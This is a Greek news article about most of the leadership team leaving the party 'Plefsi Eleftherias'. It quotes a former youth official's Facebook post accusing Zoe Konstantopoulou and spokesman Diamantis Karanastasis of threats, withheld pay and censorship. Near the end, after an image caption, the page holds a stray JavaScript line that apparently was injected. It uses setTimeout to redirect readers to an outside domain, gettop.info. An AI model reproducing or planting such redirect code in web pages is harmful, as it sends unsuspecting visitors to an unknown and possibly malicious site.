Αποχωρήσεις με αιχμές από την ηγετική ομάδα της Ζωής

0
11

 

Με πολλές αιχμές εναντίον της Ζωής Κωνσταντοπούλου αλλά και στενών συνεργατών της αποχώρησε σχεδόν ολόκληρη η ηγετική ομάδα της «Πλεύσης Ελευθερίας».

Το πρώην πλέον στέλεχος της νεολαίας Μιχάλης Κριθαρίδης, σε ανάρτησή του στο facebook, μιλά για απαράδεκτες συμπεριφορές της Ζωής Κωνσταντοπούλου και του εκπροσώπου του κόμματος και γνωστού ηθοποιού Διαμαντή Καραναστάση.

Περιγράφει κλίμα τρομοκρατίας με απειλητικά e-mail και ζητεί συγγνώμη που παρότρυνε τον κόσμο σε ένα κόμμα που, όπως γράφει, δεν έχει σχέση με την Αριστερά.

Στο ίδιο κείμενο μάλιστα αφήνει υπαινιγμούς για τον στενότερο συνεργάτη της, Διαμαντή Καραναστάση, αναφέροντας ότι διοργανώνει συναυλίες και κρύβεται πίσω από το κλίμα τρομοκρατίας, ενώ στοχοποιούσε και λογόκρινε συνεργάτες της και έγινε «καπετάνιος» στην θέση της «καπετάνισσας».

Αναλυτικότερα, ο κ Κριθαρίτης ανέφερε ότι «οι εργαζόμενοι του κόμματος ας πούμε, εργάζονταν στο κόμμα σε συνθήκες εργασιακού μεσαίωνα! Δούλευαν υπερωράρια, ενώ τις υπερωρίες και τα έξοδα κίνησης, τους τα παρακρατούσαν υπέρ του κόμματος βεβαίως βεβαίως!

Ακόμη υφίσταντο σχεδόν σε καθημερινή βάση μια απαράδεκτη συμπεριφορά μέσα σε ένα κόμμα το οποίο υποτίθεται πρέσβευε και διακήρυττε τα ανθρώπινα δικαιώματα και τις ελευθερίες και δημιουργήθηκε για να προστατέψει την κοινωνία και τους ανθρώπους.

Προσωπικά ντρέπομαι που στήριξα αυτό το πολιτικά και κοινωνικά επικίνδυνο, ανελεύθερο και αντιδημοκρατικό μόρφωμα. Που δεν έχει καμία σχέση με την Αριστερά, τις αξίες και τους αγώνες της. Και ζητώ συγγνώμη που σας παρότρυνα να στηρίξετε μία τόσο λαθεμένη πολιτική επιλογή”.

mixalis-kritharidis setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here